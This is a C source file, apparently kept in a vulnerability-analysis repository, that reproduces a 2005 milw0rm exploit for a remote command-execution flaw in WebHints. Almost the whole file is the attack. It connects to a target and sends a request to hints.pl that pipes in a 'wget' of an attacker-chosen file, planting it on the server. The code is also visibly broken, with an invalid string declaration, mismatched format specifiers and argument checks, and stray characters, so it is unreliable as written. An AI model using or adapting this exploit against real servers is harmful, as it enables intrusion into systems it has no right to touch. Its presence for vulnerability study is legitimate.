lilbool/vuln-code-analysis
0
1/*
2**************************************************************************************
3* T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m *
4**************************************************************************************
5 EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln
6
7Coded By: A l p h a _ P r o g r a m m e r (Sirus-v)
8E-Mail: Alpha_Programmer@Yahoo.Com
9
10This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself
11
12**************************************************************************************
13* GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- The-CephaleX -- Str0ke *
14*And Iranian Security & Technical Sites: *
15* *
16* TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG *
17* Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & GrayHatz.NeT *
18**************************************************************************************
19*/
20#include <string.h>
21#include <stdlib.h>
22#include <stdio.h>
23#pragma comment(lib, "ws2_32.lib")
24#include <winsock2.h>
25
26
27#define MY_PORT 80
28#define BUF_LEN 256
29/**************************************************************************************/
30int main(int arg_c, char *arg_v[])
31{
32 static const char cmd[] = "GET %chints.pl?|wget %c| HTTP/1.0\r\n\r\n" , arg_v[2] , arg_v[3];
33
34 struct sockaddr_in their_adr;
35 char buf[BUF_LEN];
36 struct hostent *he;
37 int sock, i;
38 WSADATA wsdata;
39
40/* Winsock start up */
41 WSAStartup(0x0101, &wsdata);
42 atexit((void (*)(void))WSACleanup);
43
44 if(arg_c != 3)
45 {
46 printf("=========================================================\n");
47 printf(" Webhints Exploit By Alpha_Programmer\n");
48 printf(" Trap-set Underground Hacking Team\n");
49 printf(" Usage : webhints.exe [Targ3t] [DIR] [File Address]\n");
50 printf("=========================================================\n");
51 return 1;
52 }
53/* create socket */
54printf("calling socket()...\n");
55 sock = socket(AF_INET, SOCK_STREAM, 0);
56
57/* get IP address of other end */
58printf("calling gethostbyname()...\n");
59 he = gethostbyname(arg_v[1]);
60 if(he == NULL)
61 {
62 printf("can't get IP address of host '%s'\n", arg_v[1]);
63 return 1;
64 }
65 memset(&their_adr, 0, sizeof(their_adr));
66 their_adr.sin_family = AF_INET;
67 memcpy(&their_adr.sin_addr, he->h_addr, he->h_length);
68 their_adr.sin_port = htons(MY_PORT);
69/* connect */
70printf("C0nnecting...\n");
71 i = connect(sock, (struct sockaddr *)&their_adr, sizeof(their_adr));
72 if(i != 0)
73 {
74 printf("C0nnect() returned %d, errno=%d\n", i, errno);
75 return 1;
76 }
77/* send H3ll C0mmand */
78printf("Sending H3ll Packets...\n");
79 i = send(sock, cmd, sizeof(cmd), 0);
80 if(i != sizeof(cmd))
81 {
82 printf("Send. returned %d, errno=%d\n", i, errno);
83 return 1;
84 }\n
85 printf("OK ... Now You Can Test your file in hints.pl Directory\n"):
86
87 closesocket(sock);
88 return 0;
89}
90
91// milw0rm.com [2005-06-11]